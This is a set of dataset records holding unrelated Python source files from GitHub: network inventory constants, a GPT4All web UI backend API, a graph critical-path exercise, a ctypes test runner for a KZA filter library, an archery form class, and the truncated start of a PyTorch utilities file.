STRAND_SPLICE_LIST)\nTYPE_NAME_FIBER = 'Fiber'\nTYPE_NAME_SPLICE_FOR_FIBERS = 'Splice for Fibers'\nTYPE_NAME_EDGE_SPLICE = 'Edge Splice'\n\n# Test related constants.\n# This environment variable is set during coverage runs.\nBULK_COVERAGE_RUN = 'BULK_COVERAGE_RUN'\nTEST_METHOD_PREFIX = 'test' # Prefix of methods that are tests.\n\n# Logging constants.\nLOG_CODE = 'log_code'\nLOG_TYPE = 'log_type'\nMESSAGE = 'message'\nENTITY_KIND = 'entity_kind'\nDATA = 'data'\nENVIRONMENT = 'env'\nAPP_IDENTITY = 'app_id'\n\nCREATE_OP = 'Create'\nDELETE_OP = 'Delete'\n\nCONNECTOR_TYPES = 'connector_types'\nCSVIMPORT_LOG = 'User %s has performed a legacy CSV import on kind %s.'\n\n# Local devappserver grouper groups\nLOCAL_DEVAPPSERVER_GROUPER_FILE = 'localdevappservergrouper.json'\nREAD_ONLY = 'readonly'\nNO_READ = 'noread'\nOTHER = 'other'\nGROUPS = 'groups'\n\n# Miscellaneous.\nNA = 'N/A'\n\n# Patch Panel Notification constants.\nNEW_TEMPLATE = 'new_template'\nOLD_TEMPLATE = 'old_template'\nPATCH_PANEL_TEMPLATE_NOTIFY = 'PATCH_PANEL_TEMPLATE_NOTIFY'\nPANEL_NAME = 'panel_name'\nPANEL_KEY_NAME = 'panel_key_name'\nPATCH_PANEL_NOTIFY_EMAIL_SETTING = 'PATCH_PANEL_NOTIFY_EMAIL'\nPATCH_PANEL_NOTIFY_DEFAULT_TO_ADDRESS = 'fnd@google.com'\n\nPATCHPANEL_UPDATE_EMAIL_TEMPLATE = {\n 'name': PATCH_PANEL_TEMPLATE_NOTIFY,\n 'description': 'Email template for notifying change in patch panel'\n ' template.',\n 'to': [],\n 'cc': [],\n 'subject': 'Patch Panel Template Updates: {{timestamp}}',\n 'body': (''\n 'The following updates have been made to Patch Panels.
    '\n 'No.'\n ''\n ''\n '{{content}}
    Panel NamePanel key_nameUpdated OnUpdated ByNew TemplateOld Template

    '\n 'Please make the corresponding changes in Netcracker.'\n '

    Thank you.'\n '')\n}\n\n# POR Kinds.\nBTP_TABLES = ['B2B4POR_20141223', 'DRPOR_20150102',\n 'MetroPOR_20150127', 'FPOR_20150826']\n\n# Flag to decide whether to update stoat paths for\n# handling broken ports.\nUPDATE_STOAT_PATHS_FOR_BROKEN_PORTS = 'UPDATE_STOAT_PATHS_FOR_BROKEN_PORTS'\n\n# SCULPTOR BLADE ADDRESS\nSCULPTOR_PROD = 'blade:network-config-orchestrator'\nSCULPTOR_SANDBOX = 'blade:network-config-orchestrator-sandbox'\n\n# Stoat path elements\nA_END_OLD_PE = 'a_end_old_pe'\nA_END_NEW_PE = 'a_end_new_pe'\nZ_END_OLD_PE = 'z_end_old_pe'\nZ_END_NEW_PE = 'z_end_new_pe'\nSIMPLEX = 'SIMPLEX'\nDUPLEX = 'DUPLEX'\n\nZ_ENDS = 'z_ends'\n","repo_name":"craigholland/airbus_coremods","sub_path":"_base/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":55546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31361599516","text":"######\n# Project : GPT4ALL-UI\n# File : api.py\n# Author : ParisNeo with the help of the community\n# Supported by Nomic-AI\n# license : Apache 2.0\n# Description : \n# A simple api to communicate with gpt4all-ui and its models.\n######\nfrom datetime import datetime\nfrom gpt4all_api.db import DiscussionsDB\nfrom pathlib import Path\nimport importlib\nfrom pyaipersonality import AIPersonality\nimport multiprocessing as mp\nimport threading\nimport time\nimport requests\nfrom tqdm import tqdm \nimport traceback\n\n__author__ = \"parisneo\"\n__github__ = \"https://github.com/nomic-ai/gpt4all-ui\"\n__copyright__ = \"Copyright 2023, \"\n__license__ = \"Apache 2.0\"\n\n\n\nimport subprocess\nimport pkg_resources\n\n\n# ===========================================================\n# Manage automatic install scripts\n\ndef is_package_installed(package_name):\n try:\n dist = pkg_resources.get_distribution(package_name)\n return True\n except pkg_resources.DistributionNotFound:\n return False\n\n\ndef install_package(package_name):\n try:\n # Check if the package is already installed\n __import__(package_name)\n print(f\"{package_name} is already installed.\")\n except ImportError:\n print(f\"{package_name} is not installed. Installing...\")\n \n # Install the package using pip\n subprocess.check_call([\"pip\", \"install\", package_name])\n \n print(f\"{package_name} has been successfully installed.\")\n\n\ndef parse_requirements_file(requirements_path):\n with open(requirements_path, 'r') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n # Skip empty and commented lines\n continue\n package_name, _, version_specifier = line.partition('==')\n package_name, _, version_specifier = line.partition('>=')\n if is_package_installed(package_name):\n # The package is already installed\n print(f\"{package_name} is already installed.\")\n else:\n # The package is not installed, install it\n if version_specifier:\n install_package(f\"{package_name}{version_specifier}\")\n else:\n install_package(package_name)\n\n\n# ===========================================================\n\n\nclass ModelProcess:\n def __init__(self, config=None):\n self.config = config\n self.generate_queue = mp.Queue()\n self.generation_queue = mp.Queue()\n self.cancel_queue = mp.Queue(maxsize=1)\n self.clear_queue_queue = mp.Queue(maxsize=1)\n self.set_config_queue = mp.Queue(maxsize=1)\n self.set_config_result_queue = mp.Queue(maxsize=1)\n self.started_queue = mp.Queue()\n self.process = None\n self.is_generating = mp.Value('i', 0)\n self.model_ready = mp.Value('i', 0)\n self.ready = False\n \n self.id=0\n self.n_predict=2048\n\n self.reset_config_result()\n\n def reset_config_result(self):\n self._set_config_result = {\n 'status': 'succeeded',\n 'backend_status':'ok',\n 'model_status':'ok',\n 'personality_status':'ok',\n 'errors':[]\n }\n \n def load_backend(self, backend_name:str, install=False):\n backend_path = Path(\"backends\")/backend_name\n if install:\n # first find out if there is a requirements.txt file\n install_file_name=\"install.py\"\n install_script_path = backend_path / install_file_name \n if install_script_path.exists():\n module_name = install_file_name[:-3] # Remove the \".py\" extension\n module_spec = importlib.util.spec_from_file_location(module_name, str(install_script_path))\n module = importlib.util.module_from_spec(module_spec)\n module_spec.loader.exec_module(module)\n if hasattr(module, \"Install\"):\n module.Install(self)\n\n # define the full absolute path to the module\n absolute_path = backend_path.resolve()\n\n # infer the module name from the file path\n module_name = backend_path.stem\n\n # use importlib to load the module from the file path\n loader = importlib.machinery.SourceFileLoader(module_name, str(absolute_path/\"__init__.py\"))\n backend_module = loader.load_module()\n backend_class = getattr(backend_module, backend_module.backend_name)\n return backend_class\n\n def start(self):\n if self.process is None:\n self.process = mp.Process(target=self._run)\n self.process.start()\n\n def stop(self):\n if self.process is not None:\n self.generate_queue.put(None)\n self.process.join()\n self.process = None\n\n def set_backend(self, backend_path):\n self.backend = backend_path\n\n def set_model(self, model_path):\n self.model = model_path\n \n def set_config(self, config):\n self.set_config_queue.put(config)\n # Wait for it t o be consumed\n while self.set_config_result_queue.empty():\n time.sleep(0.5)\n return self.set_config_result_queue.get()\n\n def generate(self, full_prompt, prompt, id, n_predict):\n self.generate_queue.put((full_prompt, prompt, id, n_predict))\n\n def cancel_generation(self):\n self.cancel_queue.put(('cancel',))\n\n def clear_queue(self):\n self.clear_queue_queue.put(('clear_queue',))\n \n def rebuild_backend(self, config):\n try:\n print(\" ******************* Building Backend from main Process *************************\")\n backend = self.load_backend(config[\"backend\"], install=True)\n print(\"Backend loaded successfully\")\n except Exception as ex:\n print(\"Couldn't build backend.\")\n print(ex)\n backend = None\n self._set_config_result['backend_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't build backend:{ex}\")\n return backend\n \n def _rebuild_model(self):\n try:\n print(\" ******************* Building Backend from generation Process *************************\")\n self.backend = self.load_backend(self.config[\"backend\"], install=True)\n print(\"Backend loaded successfully\")\n try:\n model_file = Path(\"models\")/self.config[\"backend\"]/self.config[\"model\"]\n print(f\"Loading model : {model_file}\")\n self.model = self.backend(self.config)\n self.model_ready.value = 1\n print(\"Model created successfully\\n\")\n except Exception as ex:\n traceback.print_exc()\n print(\"Couldn't build model\")\n print(ex)\n self.model = None\n self._set_config_result['model_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't build model:{ex}\")\n except Exception as ex:\n traceback.print_exc()\n print(\"Couldn't build backend\")\n print(ex)\n self.backend = None\n self.model = None\n\n def rebuild_personality(self):\n try:\n print(\" ******************* Building Personality from main Process *************************\")\n personality_path = f\"personalities/{self.config['personality_language']}/{self.config['personality_category']}/{self.config['personality']}\"\n personality = AIPersonality(personality_path, run_scripts=False)\n print(f\" ************ Personality {personality.name} is ready (Main process) ***************************\")\n except Exception as ex:\n print(f\"Personality file not found or is corrupted ({personality_path}).\\nPlease verify that the personality you have selected exists or select another personality. Some updates may lead to change in personality name or category, so check the personality selection in settings to be sure.\")\n if self.config[\"debug\"]:\n print(ex)\n personality = AIPersonality()\n \n return personality\n \n def _rebuild_personality(self):\n try:\n print(\" ******************* Building Personality from generation Process *************************\")\n personality_path = f\"personalities/{self.config['personality_language']}/{self.config['personality_category']}/{self.config['personality']}\"\n self.personality = AIPersonality(personality_path)\n print(f\" ************ Personality {self.personality.name} is ready (generation process) ***************************\")\n except Exception as ex:\n print(f\"Personality file not found or is corrupted ({personality_path}).\")\n print(f\"Please verify that the personality you have selected exists or select another personality. Some updates may lead to change in personality name or category, so check the personality selection in settings to be sure.\")\n print(f\"Exception: {ex}\")\n if self.config[\"debug\"]:\n print(ex)\n self.personality = AIPersonality()\n self._set_config_result['personality_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't load personality:{ex}\")\n \n def step_callback(self, text, message_type):\n if message_type==0:\n self.generation_queue.put((text,self.id, message_type))\n \n def _run(self): \n self._rebuild_model()\n self._rebuild_personality()\n if self.model_ready.value == 1:\n self.n_predict = 1\n self._generate(\"I\",1)\n print()\n print(\"Ready to receive data\")\n else:\n print(\"No model loaded. Waiting for new configuration instructions\")\n \n self.ready = True\n print(f\"Listening on :http://{self.config['host']}:{self.config['port']}\")\n while True:\n try:\n self._check_set_config_queue()\n self._check_cancel_queue()\n self._check_clear_queue()\n\n if not self.generate_queue.empty():\n command = self.generate_queue.get()\n if command is None:\n break\n\n if self.cancel_queue.empty() and self.clear_queue_queue.empty():\n self.is_generating.value = 1\n self.started_queue.put(1)\n self.id=command[2]\n self.n_predict=command[3]\n if self.personality.processor is not None:\n if self.personality.processor_cfg is not None:\n if \"custom_workflow\" in self.personality.processor_cfg:\n if self.personality.processor_cfg[\"custom_workflow\"]:\n print(\"Running workflow\")\n output = self.personality.processor.run_workflow(self._generate, command[1], command[0], self.step_callback)\n self._callback(output)\n self.is_generating.value = 0\n continue\n\n self._generate(command[0], self.n_predict, self._callback)\n while not self.generation_queue.empty():\n time.sleep(1)\n self.is_generating.value = 0\n time.sleep(1)\n except Exception as ex:\n time.sleep(1)\n print(ex)\n\n def _generate(self, prompt, n_predict=50, callback=None):\n if self.model is not None:\n self.id = self.id\n if self.config[\"override_personality_model_parameters\"]:\n output = self.model.generate(\n prompt,\n new_text_callback=callback,\n n_predict=n_predict,\n temp=self.config['temperature'],\n top_k=self.config['top_k'],\n top_p=self.config['top_p'],\n repeat_penalty=self.config['repeat_penalty'],\n repeat_last_n = self.config['repeat_last_n'],\n seed=self.config['seed'],\n n_threads=self.config['n_threads']\n )\n else:\n output = self.model.generate(\n prompt,\n new_text_callback=callback,\n n_predict=self.n_predict,\n temp=self.personality.model_temperature,\n top_k=self.personality.model_top_k,\n top_p=self.personality.model_top_p,\n repeat_penalty=self.personality.model_repeat_penalty,\n repeat_last_n = self.personality.model_repeat_last_n,\n #seed=self.config['seed'],\n n_threads=self.config['n_threads']\n )\n else:\n print(\"No model is installed or selected. Please make sure to install a model and select it inside your configuration before attempting to communicate with the model.\")\n print(\"To do this: Install the model to your models/ folder.\")\n print(\"Then set your model information in your local configuration file that you can find in configs/local_default.yaml\")\n print(\"You can also use the ui to set your model in the settings page.\")\n output = \"\"\n return output\n\n def _callback(self, text):\n if not self.ready:\n print(\".\",end=\"\", flush=True)\n return True\n else:\n # Stream the generated text to the main process\n self.generation_queue.put((text,self.id, 0))\n self._check_set_config_queue()\n self._check_cancel_queue()\n self._check_clear_queue() \n # if stop generation is detected then stop\n if self.is_generating.value==1:\n return True\n else:\n return False\n\n def _check_cancel_queue(self):\n while not self.cancel_queue.empty():\n command = self.cancel_queue.get()\n if command is not None:\n self._cancel_generation()\n\n def _check_clear_queue(self):\n while not self.clear_queue_queue.empty():\n command = self.clear_queue_queue.get()\n if command is not None:\n self._clear_queue()\n\n def _check_set_config_queue(self):\n while not self.set_config_queue.empty():\n config = self.set_config_queue.get()\n if config is not None:\n print(\"Inference process : Setting configuration\")\n self.reset_config_result()\n self._set_config(config)\n self.set_config_result_queue.put(self._set_config_result)\n\n def _cancel_generation(self):\n self.is_generating.value = 0\n \n def _clear_queue(self):\n while not self.generate_queue.empty():\n self.generate_queue.get()\n\n def _set_config(self, config):\n bk_cfg = self.config\n self.config = config\n print(\"Changing configuration\")\n # verify that the backend is the same\n if self.config[\"backend\"]!=bk_cfg[\"backend\"] or self.config[\"model\"]!=bk_cfg[\"model\"]:\n self._rebuild_model()\n \n # verify that the personality is the same\n if self.config[\"personality\"]!=bk_cfg[\"personality\"] or self.config[\"personality_category\"]!=bk_cfg[\"personality_category\"] or self.config[\"personality_language\"]!=bk_cfg[\"personality_language\"]:\n self._rebuild_personality()\n\n\nclass GPT4AllAPI():\n def __init__(self, config:dict, socketio, config_file_path:str) -> None:\n self.socketio = socketio\n #Create and launch the process\n self.process = ModelProcess(config)\n self.config = config\n \n self.backend = self.process.rebuild_backend(self.config)\n self.personality = self.process.rebuild_personality()\n if config[\"debug\"]:\n print(print(f\"{self.personality}\"))\n self.config_file_path = config_file_path\n self.cancel_gen = False\n\n # Keeping track of current discussion and message\n self.current_discussion = None\n self._current_user_message_id = 0\n self._current_ai_message_id = 0\n self._message_id = 0\n\n self.db_path = config[\"db_path\"]\n\n # Create database object\n self.db = DiscussionsDB(self.db_path)\n\n # If the database is empty, populate it with tables\n self.db.populate()\n\n # This is used to keep track of messages \n self.full_message_list = []\n \n # =========================================================================================\n # Socket IO stuff \n # =========================================================================================\n @socketio.on('connect')\n def connect():\n print('Client connected')\n\n @socketio.on('disconnect')\n def disconnect():\n print('Client disconnected')\n\n @socketio.on('install_model')\n def install_model(data):\n def install_model_():\n print(\"Install model triggered\")\n model_path = data[\"path\"]\n progress = 0\n installation_dir = Path(f'./models/{self.config[\"backend\"]}/')\n filename = Path(model_path).name\n installation_path = installation_dir / filename\n print(\"Model install requested\")\n print(f\"Model path : {model_path}\")\n\n if installation_path.exists():\n print(\"Error: Model already exists\")\n socketio.emit('install_progress',{'status': 'failed', 'error': 'model already exists'})\n \n socketio.emit('install_progress',{'status': 'progress', 'progress': progress})\n \n def callback(progress):\n socketio.emit('install_progress',{'status': 'progress', 'progress': progress})\n \n self.download_file(model_path, installation_path, callback)\n socketio.emit('install_progress',{'status': 'succeeded', 'error': ''})\n tpe = threading.Thread(target=install_model_, args=())\n tpe.start()\n \n \n @socketio.on('uninstall_model')\n def uninstall_model(data):\n model_path = data['path']\n installation_dir = Path(f'./models/{self.config[\"backend\"]}/')\n filename = Path(model_path).name\n installation_path = installation_dir / filename\n\n if not installation_path.exists():\n socketio.emit('install_progress',{'status': 'failed', 'error': 'The model does not exist'})\n\n installation_path.unlink()\n socketio.emit('install_progress',{'status': 'succeeded', 'error': ''})\n \n\n \n @socketio.on('generate_msg')\n def generate_msg(data):\n if self.process.model_ready.value==1:\n if self.current_discussion is None:\n if self.db.does_last_discussion_have_messages():\n self.current_discussion = self.db.create_discussion()\n else:\n self.current_discussion = self.db.load_last_discussion()\n\n message = data[\"prompt\"]\n message_id = self.current_discussion.add_message(\n \"user\", message, parent=self.message_id\n )\n\n self.current_user_message_id = message_id\n tpe = threading.Thread(target=self.start_message_generation, args=(message, message_id))\n tpe.start()\n else:\n self.socketio.emit('infos',\n {\n \"status\":'model_not_ready',\n \"type\": \"input_message_infos\",\n 'logo': \"\",\n \"bot\": self.personality.name,\n \"user\": self.personality.user_name,\n \"message\":\"\",\n \"user_message_id\": self.current_user_message_id,\n \"ai_message_id\": self.current_ai_message_id,\n }\n )\n\n @socketio.on('generate_msg_from')\n def handle_connection(data):\n message_id = int(data['id'])\n message = data[\"prompt\"]\n self.current_user_message_id = message_id\n tpe = threading.Thread(target=self.start_message_generation, args=(message, message_id))\n tpe.start()\n # generation status\n self.generating=False\n self.process.start()\n\n\n #properties\n @property\n def message_id(self):\n return self._message_id\n\n @property\n def current_user_message_id(self):\n return self._current_user_message_id\n @current_user_message_id.setter\n def current_user_message_id(self, id):\n self._current_user_message_id=id\n self._message_id = id\n @property\n def current_ai_message_id(self):\n return self._current_ai_message_id\n @current_ai_message_id.setter\n def current_ai_message_id(self, id):\n self._current_ai_message_id=id\n self._message_id = id\n\n\n def download_file(self, url, installation_path, callback=None):\n \"\"\"\n Downloads a file from a URL, reports the download progress using a callback function, and displays a progress bar.\n\n Args:\n url (str): The URL of the file to download.\n installation_path (str): The path where the file should be saved.\n callback (function, optional): A callback function to be called during the download\n with the progress percentage as an argument. Defaults to None.\n \"\"\"\n try:\n response = requests.get(url, stream=True)\n\n # Get the file size from the response headers\n total_size = int(response.headers.get('content-length', 0))\n\n with open(installation_path, 'wb') as file:\n downloaded_size = 0\n with tqdm(total=total_size, unit='B', unit_scale=True, ncols=80) as progress_bar:\n for chunk in response.iter_content(chunk_size=8192):\n if chunk:\n file.write(chunk)\n downloaded_size += len(chunk)\n if callback is not None:\n percentage = (downloaded_size / total_size) * 100\n callback(percentage)\n progress_bar.update(len(chunk))\n\n if callback is not None:\n callback(100.0)\n\n print(\"File downloaded successfully\")\n except Exception as e:\n print(\"Couldn't download file:\", str(e))\n\n\n \n def condition_chatbot(self):\n if self.current_discussion is None:\n self.current_discussion = self.db.load_last_discussion()\n \n if self.personality.welcome_message!=\"\":\n message_id = self.current_discussion.add_message(\n self.personality.name, self.personality.welcome_message, \n DiscussionsDB.MSG_TYPE_NORMAL,\n 0,\n -1\n )\n \n self.current_ai_message_id = message_id\n else:\n message_id = 0\n return message_id\n\n def prepare_reception(self):\n self.bot_says = \"\"\n self.full_text = \"\"\n self.is_bot_text_started = False\n\n def create_new_discussion(self, title):\n self.current_discussion = self.db.create_discussion(title)\n # Get the current timestamp\n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Chatbot conditionning\n self.condition_chatbot()\n return timestamp\n\n def prepare_query(self, message_id=-1):\n messages = self.current_discussion.get_messages()\n self.full_message_list = []\n for message in messages:\n if message[\"id\"]< message_id or message_id==-1: \n if message[\"type\"]==self.db.MSG_TYPE_NORMAL:\n if message[\"sender\"]==self.personality.name:\n self.full_message_list.append(self.personality.ai_message_prefix+message[\"content\"])\n else:\n self.full_message_list.append(self.personality.user_message_prefix + message[\"content\"])\n else:\n break\n\n if self.personality.processor is not None:\n preprocessed_prompt = self.personality.processor.process_model_input(message[\"content\"])\n else:\n preprocessed_prompt = message[\"content\"]\n if preprocessed_prompt is not None:\n self.full_message_list.append(self.personality.user_message_prefix+preprocessed_prompt+self.personality.link_text+self.personality.ai_message_prefix)\n else:\n self.full_message_list.append(self.personality.user_message_prefix+message[\"content\"]+self.personality.link_text+self.personality.ai_message_prefix)\n\n\n link_text = self.personality.link_text\n\n if len(self.full_message_list) > self.config[\"nb_messages_to_remember\"]:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list[-self.config[\"nb_messages_to_remember\"]:])\n else:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list)\n \n return discussion_messages, message[\"content\"]\n\n def get_discussion_to(self, message_id=-1):\n messages = self.current_discussion.get_messages()\n self.full_message_list = []\n for message in messages:\n if message[\"id\"]<= message_id or message_id==-1: \n if message[\"type\"]!=self.db.MSG_TYPE_CONDITIONNING:\n if message[\"sender\"]==self.personality.name:\n self.full_message_list.append(self.personality.ai_message_prefix+message[\"content\"])\n else:\n self.full_message_list.append(self.personality.user_message_prefix + message[\"content\"])\n\n link_text = self.personality.link_text\n\n if len(self.full_message_list) > self.config[\"nb_messages_to_remember\"]:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list[-self.config[\"nb_messages_to_remember\"]:])\n else:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list)\n \n return discussion_messages # Removes the last return\n\n\n def remove_text_from_string(self, string, text_to_find):\n \"\"\"\n Removes everything from the first occurrence of the specified text in the string (case-insensitive).\n\n Parameters:\n string (str): The original string.\n text_to_find (str): The text to find in the string.\n\n Returns:\n str: The updated string.\n \"\"\"\n index = string.lower().find(text_to_find.lower())\n\n if index != -1:\n string = string[:index]\n\n return string\n\n def process_chunk(self, chunk):\n print(chunk,end=\"\", flush=True)\n self.bot_says += chunk\n if not self.personality.detect_antiprompt(self.bot_says):\n self.socketio.emit('message', {\n 'data': self.bot_says, \n 'user_message_id':self.current_user_message_id, \n 'ai_message_id':self.current_ai_message_id, \n 'discussion_id':self.current_discussion.discussion_id\n }\n )\n if self.cancel_gen:\n print(\"Generation canceled\")\n self.process.cancel_generation()\n self.cancel_gen = False\n else:\n self.bot_says = self.remove_text_from_string(self.bot_says, self.personality.user_message_prefix.strip())\n self.process.cancel_generation()\n print(\"The model is halucinating\")\n \n def start_message_generation(self, message, message_id):\n bot_says = \"\"\n\n # send the message to the bot\n print(f\"Received message : {message}\")\n if self.current_discussion:\n # First we need to send the new message ID to the client\n self.current_ai_message_id = self.current_discussion.add_message(\n self.personality.name, \"\", parent = self.current_user_message_id\n ) # first the content is empty, but we'll fill it at the end\n self.socketio.emit('infos',\n {\n \"status\":'generation_started',\n \"type\": \"input_message_infos\",\n \"bot\": self.personality.name,\n \"user\": self.personality.user_name,\n \"message\":message,#markdown.markdown(message),\n \"user_message_id\": self.current_user_message_id,\n \"ai_message_id\": self.current_ai_message_id,\n }\n )\n\n # prepare query and reception\n self.discussion_messages, self.current_message = self.prepare_query(message_id)\n self.prepare_reception()\n self.generating = True\n print(\">Generating message\")\n self.process.generate(self.discussion_messages, self.current_message, message_id, n_predict = self.config['n_predict'])\n self.process.started_queue.get()\n while(self.process.is_generating.value): # Simulating other commands being issued\n chunk = \"\"\n while not self.process.generation_queue.empty():\n chk, tok, message_type = self.process.generation_queue.get()\n chunk += chk\n if chunk!=\"\":\n self.process_chunk(chunk)\n\n print()\n print(\"## Done ##\")\n print()\n\n # Send final message\n self.socketio.emit('final', {\n 'data': self.bot_says, \n 'ai_message_id':self.current_ai_message_id, \n 'parent':self.current_user_message_id, 'discussion_id':self.current_discussion.discussion_id\n }\n )\n\n self.current_discussion.update_message(self.current_ai_message_id, self.bot_says)\n self.full_message_list.append(self.bot_says)\n self.cancel_gen = False \n return bot_says\n else:\n #No discussion available\n print(\"No discussion selected!!!\")\n print(\"## Done ##\")\n print()\n self.cancel_gen = False\n return \"\"\n ","repo_name":"ParisNeo/Gpt4All-webui","sub_path":"gpt4all_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":31488,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"21"} +{"seq_id":"20907915105","text":"import sys\nimport heapq\nfrom collections import deque\n\nn = int(input())\nm = int(input())\n\nind =[0]*(n+1)\nlinks = [[]for _ in range(n+1)]\ntotal_cost = [0]*(n+1)\ntotal_count = [0]*(n+1)\n\nfor i in range(m):\n start, end, cost = map(int,sys.stdin.readline().split())\n links[start].append([cost*-1,end])\n ind[end] += 1\n\nstart,end = map(int,sys.stdin.readline().split())\n\nq = [[0,start]]\n\nwhile q :\n now = heapq.heappop(q)\n now_cost = now[0]\n now_location = now[1]\n\n for i in links[now_location]:\n next_cost = now_cost + i[0]\n next_location = i[1]\n\n if total_cost[next_location] >= next_cost :\n total_cost[next_location] = next_cost\n \n a = (next_cost,next_location)\n heapq.heappush(q,a)\n\nend_cost = total_cost[end]\n\nprint(total_cost[end] * -1)\n\n\ndef back(n,co,backlist):\n for i in links[n]:\n if i[1]+co > end_cost:\n continue \n elif i[1]+co == end_cost:\n backlist.append(i[1])\n total_list.append(backlist)\n backlist.pop()\n continue\n else:\n backlist.append(i[1])\n back(i[1],i[1]+co,backlist)\n backlist.pop()\n\ntlist =[1]\ntotal_list =[]\nback(1,0,tlist)\nprint(tlist)\n# print(total_passed)\n# total_passed = set(total_passed)\n# sort_passed = []\n# for i in total_passed:\n# b = str(i)\n# for j in range(len(b)-1):\n# sort_passed.append(b[j]+b[j+1])\n\n# print(len(set(sort_passed)))","repo_name":"Suyeon-B/week03_team","sub_path":"dd0114/23_1948_임계경로 copy 2.py","file_name":"23_1948_임계경로 copy 2.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5037084493","text":"from os import listdir, getcwd\nfrom os.path import isfile, join\nimport ctypes as ct\nimport numpy as np\n\ndef get_dynamic_lib(path):\n libkza_path = path + \"/libkza.so\"\n libkza = ct.CDLL(libkza_path)\n return libkza\n\ndef get_kz_func(libkza):\n libkza.kz.argtypes = [\n ct.POINTER(ct.c_double), \n ct.c_int, \n ct.POINTER(ct.c_int), \n ct.POINTER(ct.c_int), \n ct.c_int\n ]\n libkza.kz.restype = ct.POINTER(ct.c_double)\n return libkza.kz\n\ndef get_kza_func(libkza):\n libkza.kza.argtypes = [\n ct.POINTER(ct.c_double), \n ct.c_int, \n ct.POINTER(ct.c_int), \n ct.POINTER(ct.c_double), \n ct.POINTER(ct.c_int), \n ct.c_int,\n ct.c_double,\n ct.c_double\n ]\n libkza.kza.restype = ct.POINTER(ct.c_double)\n\n libkza.kza_free.argtypes = [ct.POINTER(ct.c_double)]\n libkza.kza_free.restype = None\n return libkza.kza\n\ndef get_kza_free_func(libkza):\n libkza.kza_free.argtypes = [ct.POINTER(ct.c_double)]\n libkza.kza_free.restype = None\n return libkza.kza_free\n\ndef get_input_files(path):\n input_files = []\n for f in listdir(path):\n if isfile(join(path, f)):\n file_suffixes = f.split('.')\n if len(file_suffixes) > 0:\n data_type = file_suffixes[1]\n if data_type == \"in\":\n input_files.append(f)\n return input_files\n\ndef kz1d(x, m, k, kz, kza_free):\n xp = (ct.c_double * len(x))(*x)\n dim = 1\n size = (ct.c_int)(len(x))\n window = (ct.c_int)(m)\n res = kz(xp, dim, ct.byref(size), ct.byref(window), k)\n ans = res[:len(x)]\n kza_free(res)\n return ans\n\ndef kza1d(x, m, k, kza, kz, kza_free):\n min_size = 10\n tol = 1.0e-5\n y = kz1d(x, m, k, kz, kza_free) \n xp = (ct.c_double * len(x))(*x)\n yp = (ct.c_double * len(y))(*y)\n dim = 1\n size = (ct.c_int)(len(x))\n window = (ct.c_int)(m)\n res = kza(xp, dim, ct.byref(size), yp, ct.byref(window), k, min_size, tol)\n ans = res[:len(x)]\n kza_free(res)\n return ans\n\ndef run_func_tests(func_name, path, funcs):\n tests_path = join(path, func_name + '/')\n input_files = get_input_files(tests_path)\n\n kz = funcs[\"kz\"]\n kza = funcs[\"kza\"]\n kza_free = funcs[\"kza_free\"]\n\n for f in input_files:\n file_name = f.split('.')[0]\n\n x = np.loadtxt(join(tests_path, f))\n ans = np.loadtxt(join(tests_path, file_name + '.out'))\n res = None \n\n if func_name == \"kz1d\":\n win_size = 30\n iterations = 3\n res = kz1d(x, win_size, iterations, kz, kza_free)\n elif func_name == \"kza1d\":\n win_size = 365\n iterations = 3\n res = kza1d(x, win_size, iterations, kza, kz, kza_free)\n\n if not np.allclose(res, ans):\n diff = res - ans\n print(diff)\n print(f\"test [{func_name}/{file_name}] failed\")\n \n\ndef main():\n script_path = getcwd()\n\n funcs = {\n \"kz\": None,\n \"kza\": None,\n \"kza_free\": None\n }\n\n libkza = get_dynamic_lib(script_path)\n funcs[\"kz\"] = get_kz_func(libkza)\n funcs[\"kza\"] = get_kza_func(libkza)\n funcs[\"kza_free\"] = get_kza_free_func(libkza)\n\n tests_path = join(script_path, 'tests/')\n run_func_tests(\"kz1d\", tests_path, funcs)\n run_func_tests(\"kza1d\", tests_path, funcs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jakosv/kza","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33787460344","text":"# -*- coding: utf-8 -*-\n\n\nfrom entrenamiento.views.form import ModelForm\n\nclass ArcoForm(ModelForm):\n ''' Tiene todas las columnas que corresponden tanto a los arcos\n recurvados como compuestos.\n '''\n\n def __init__(self, model_class, object_id=None):\n super(ArcoForm, self).__init__(model_class,\n ['tipo_arco', 'id_usuario'],\n object_id)\n\n\n\nclass ArcoRecurvadoForm(ArcoForm):\n\n def __init__(self, model_class, object_id=None):\n super(ArcoRecurvadoForm, self).__init__(model_class,\n object_id)\n\n","repo_name":"tzulberti/entrenamiento-arqueria","sub_path":"entrenamiento/views/arcos/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14797687791","text":"## Utils\n\nfrom datasets import load_dataset, Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torchvision.transforms import Compose, ColorJitter, ToTensor, Resize, RandomHorizontalFlip, RandomVerticalFlip, RandomRotation, RandomAffine\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nimport torch\nfrom time import time\nimport torch.utils.tensorboard as tb\nimport torch.nn.functional as F\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nimport torchvision.transforms\nfrom torch import save\nfrom os import path\n\nclass 